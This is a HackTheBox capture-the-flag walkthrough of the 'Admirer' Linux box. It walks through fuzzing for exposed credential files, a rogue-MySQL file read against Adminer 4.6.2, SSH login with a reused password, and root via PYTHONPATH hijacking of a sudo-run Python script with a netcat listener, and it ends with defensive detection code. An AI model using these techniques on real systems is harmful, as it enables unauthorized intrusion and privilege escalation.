Admirer HackTheBox WalkThrough


This is the Admirer HackTheBox walkthrough. In this writeup I have demonstrated, step by step, how I rooted the Admirer HackTheBox machine. First, some details about the machine: it is a Linux box with IP address 10.10.10.187, rated easy by its maker.

Before starting, connect your PC to the VPN and confirm connectivity with the Admirer machine by pinging the IP 10.10.10.187. If everything is fine, start hacking. As usual, I started by scanning the box. Scanning gives us an idea of how to proceed further: it helps with banner grabbing of the services running on different ports, and sometimes it helps with vulnerability scanning. Nmap (a port scanner) gave the following result:

Scanning

$ nmap -sV -sC -oN admirer_scan 10.10.10.187

Nmap scan report during Admirer Hackthebox Walkthrough

Nmap revealed that ports 21, 22 and 80 are open: vsftpd on port 21, SSH on port 22 and an Apache2 web server on port 80. I searched for public exploits for vsftpd 3.0.3 using the searchsploit tool, but none exists for this version. Tried anonymous FTP login with the credentials anonymous : anonymous, but the login failed. Left it there and moved on to further enumeration. Port 80 is open, so a website may be hosted on the Apache2 web server running on it. Going to the URL http://10.10.10.187/, I got a web page containing a large number of images.

Admirer hackthebox website webpage

Tried to enumerate more on this page but got no hint; even the page source gave nothing useful to proceed with. Checked the robots.txt file and found a disallowed folder named admin-dir and a username, waldo. Added this user to my notes as a potential user. The robots.txt file also hinted at contacts and creds files inside admin-dir.

Robots.txt file of the Admirer HTB webpage

As soon as I had these hints about the important files, I fuzzed for them, assuming they might be text files.

$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt --sc 200 -u http://10.10.10.187/admin-dir/FUZZ.txt -t 50

Fuzzing for txt files in the admin-dir directory of the Admirer HackTheBox machine

Fuzzing revealed contacts.txt and credentials.txt, available at http://10.10.10.187/admin-dir/contacts.txt and http://10.10.10.187/admin-dir/credentials.txt respectively.

Listing the contents of contacts.txt file during Admirer hackthebox walkthrough
Listing the contents of credentials.txt file during Admirer hackthebox walkthrough

Both files contain many credentials, along with lots of potential usernames and passwords. The useful ones for us are the FTP account credentials, because port 21 is open with an FTP server running on it. The FTP credential is ftpuser : %n?4Wz}R$tTF7.

Login to FTP Account

$ ftp 10.10.10.187

~ftpuser

~%n?4Wz}R$tTF7

Found two files, dump.sql and html.tar.gz, inside the FTP directory. Downloaded them to my local machine using the mget FTP command to enumerate them further.

ftp> ls

ftp> mget dump.sql html.tar.gz    // download both files to the local machine

ftp> pwd

Login to ftp account of user ftpuser using the enumerated password during admirer hackthebox walkthrough

After enumerating the contents of all the downloaded files, I got some useful information, listed below.

Got the database name from the dump.sql file.

Dumping the content of dump.sql file

Got the database username and password from the db_admin.php file.

Database: admirerdb

Username: waldo

Password: Wh3r3_1s_w4ld0?

Dumping the content of db_admin.php file on screen

We now have database credentials. Since port 3306 is not open on the Admirer machine, we cannot connect to the database remotely, so for now these credentials are of no use. Reading the contents of db_admin.php more carefully, I noticed a hint:

// TODO: Finish implementing this or find a better open source alternative.

So I fuzzed for file names with wfuzz, using the extensions php, txt and html.

$wfuzz -c -w /opt/SecLists-master/Discovery/Web-Content/big.txt -z list,php-txt-html --hc 403,404 -t 100 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z

Fuzzing using wfuzz for php, html and txt file in utility-scripts folder

Fuzzing listed three files, namely adminer.php, info.php and phptest.php. Going to the URL http://10.10.10.187/utility-scripts/adminer.php, I found the login panel of Adminer (a remote database administration tool written in PHP, much like phpMyAdmin), along with the installed version of the Adminer software, which is 4.6.2. As soon as I had the software name and version, I searched for a public exploit. Googling "adminer 4.6.2 exploit" gave this article on the very first page of the search results. For more information on how this vulnerability works, read the above article.

A snippet on how this exploit works is attached below.

Snippet showing how the Adminer 4.6.2 vulnerability works
Image-src: foregenix.com

To exploit this vulnerability I did the following:

Configure MySQL Server

1. Installed a MySQL server on my local machine (MySQL is present in Kali by default). On other distros, use the command below to install it.

$apt install default-mysql-server

2. Started the MySQL service

$systemctl start mysql

3. Logged into the MySQL server with the default root credentials: username root and a blank password.

$mysql -u'root'

4. Created a new user dkm that can access this server from any remote host.

MariaDB [(none)]> CREATE USER 'dkm'@'%' IDENTIFIED BY 'mypassword';

5. Granted all privileges on all databases to the user dkm.

MariaDB [(none)]> GRANT ALL PRIVILEGES ON *.* TO 'dkm'@'%';

6. Reloaded the privilege tables.

MariaDB [(none)]> FLUSH PRIVILEGES;

7. Created a database admirer and a table test inside it.

MariaDB [(none)]> create database admirer;

MariaDB [(none)]> use admirer;

MariaDB [admirer]> create table test(name varchar(255));

MariaDB [admirer]> exit;

8. Allowed remote hosts to connect to this SQL server by changing the bind address from 127.0.0.1 to 0.0.0.0 in the file 50-server.cnf in the directory /etc/mysql/mariadb.conf.d/.

9. Restarted the MySQL server to apply the changes

$systemctl restart mysql

10. Confirmed connectivity to the server by logging in as user dkm with password mypassword.

$mysql -u'dkm' -p'mypassword' -h localhost

11. Finally, logged into the Adminer login panel with the credentials of the newly created user.

Configuring the MySQL server on my local machine and creating a new user to allow remote login during the Admirer HackTheBox walkthrough

Logged into my MySQL server through the Adminer login panel at http://10.10.10.187/utility-scripts/adminer.php using the following credentials:

System: MySQL

Server: 10.10.14.14 (My tun0 IP)

Username: dkm

Password: mypassword

Database: admirer

Login Panel of Adminer Web Interface in Admirer Hackthebox Walkthrough

After login, select the SQL Command option in the left pane.

Adminer web portal after logging in

Enter the following command to load the index.php file and click Execute.

load data local infile '../index.php'

into table test

fields terminated by "/n"

For more information about LOAD DATA, you can read here.

Entering the SQL command to execute on the Adminer database during the Admirer HackTheBox walkthrough

After the command has executed successfully, click select in the left pane to list the contents of the loaded file.

Web interface after successful execution of the SQL command

After loading index.php, I got the following contents; a snippet is given below.

Contents of the index.php file loaded on screen

From the above file, extracted the credential waldo : &<h5b~yK3F#{PaPB&dA}{H>

According to the above file, this credential is for accessing the admirer database. However, no port is listening for database connections (confirmed through the nmap scan). So I tried this credential to log into the SSH account of user waldo, and the login succeeded: the database password had been reused for the SSH account.

Gaining User Access

$ ssh [email protected]

~&<h5b~yK3F#{PaPB&dA}{H>

$ whoami && id

Logging into the Admirer HackTheBox machine over SSH during the walkthrough

Capture User Flag

$cat user.txt

User flag of Admirer HackTheBox captured during the walkthrough

Privilege Escalation

Finding PrivEsc Vector

The $ sudo -l command revealed that:

User waldo may run the following commands on admirer:

(ALL) SETENV: /opt/scripts/admin_tasks.sh

In other words, user waldo may run the admin_tasks.sh script as root.

Running sudo -l to see any special permissions given to user waldo in the Admirer HackTheBox walkthrough

Since user waldo can run the admin_tasks.sh script with root privileges, every file or command executed from inside this script runs with the same root privileges. The function backup_web() inside admin_tasks.sh calls backup.py, which is located in the /opt/scripts/ directory, so when we execute admin_tasks.sh, backup.py is also executed as root. Since backup.py imports the shutil library, there is a chance of Python library hijacking.

So here our privilege escalation vector can be Python library hijacking. Check this article for more info about PLH.

backup_web() function of the admin_tasks.sh file

Content of backup.py file

To perform Python library hijacking and get a root shell, I did the following:

Started a Netcat listener in one terminal

$nc -nvlp 1234

and ran the following commands in another terminal

$ mkdir /tmp/ethicalhacs

$ nano /tmp/ethicalhacs/shutil.py

$ cat /tmp/ethicalhacs/shutil.py

$ sudo PYTHONPATH=/tmp/ethicalhacs /opt/scripts/admin_tasks.sh

Privilege Escalation In Admirer HacktheBox Walkthrough

~Choose an option: 6

We can see that we have successfully escalated privileges to root via Python library hijacking.
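Seen from the defender's side, the weak points above are the SETENV tag in the sudo rule (it lets PYTHONPATH through sudo) and a root-run Python script that trusts the default module search path. The following added example is my own code, not from the box or the author: it parses sudo -l style output for SETENV rules (the rule lines are a constructed sample modelled on the one on this page) and then shows, with an inert stand-in shutil module in a temporary directory, that a child interpreter picks the stand-in up under a normal launch but not when started in isolated mode (python3 -I, which ignores PYTHONPATH).

```python
import os
import subprocess
import sys
import tempfile

# Constructed sample of `sudo -l` output, modelled on the rule shown on this page.
SUDO_L_OUTPUT = """\
User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
    (ALL) NOPASSWD: /usr/bin/systemctl restart apache2
"""


def setenv_rules(sudo_l_output):
    """Return the command of every sudo rule that carries the SETENV tag.

    SETENV lets the caller pass variables such as PYTHONPATH through sudo,
    which is what makes module hijacking in a root-run Python script possible.
    """
    risky = []
    for line in sudo_l_output.splitlines():
        line = line.strip()
        if not line.startswith("("):      # only "(runas) TAGS: command" lines
            continue
        _, _, rest = line.partition(")")
        tokens = rest.split()
        tags = {t.rstrip(":") for t in tokens if t.endswith(":")}
        command = " ".join(t for t in tokens if not t.endswith(":"))
        if "SETENV" in tags:
            risky.append(command)
    return risky


def shutil_origin(pythonpath_dir, isolated):
    """Start a child interpreter with PYTHONPATH set and report which file `shutil` came from."""
    env = dict(os.environ, PYTHONPATH=pythonpath_dir)
    cmd = [sys.executable] + (["-I"] if isolated else [])
    cmd += ["-c", "import shutil; print(shutil.__file__)"]
    return subprocess.run(cmd, env=env, capture_output=True, text=True, check=True).stdout.strip()


def hijack_possible():
    """Return (normal_launch_hijacked, isolated_launch_hijacked) using a harmless stand-in module."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "shutil.py"), "w") as f:
            f.write("MARKER = 'stand-in shutil, no payload'\n")  # constructed, inert
        normal = shutil_origin(d, isolated=False).startswith(d)
        hardened = shutil_origin(d, isolated=True).startswith(d)
    return normal, hardened
```

Dropping SETENV from the sudoers entry, or having admin_tasks.sh invoke backup.py with python3 -I, closes this particular path.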

Capture Root Flag

$cat /root/root.txt

Root Flag captured during Admirer Hackthebox Walkthrough

This is how I rooted the Admirer HackTheBox machine. Thanks for reading this walkthrough. I learnt a lot from rooting this box; I hope you have also learnt something new. Feel free to share your experience in the comment section. For any query or suggestion related to the walkthrough, feel free to write to us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter and CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/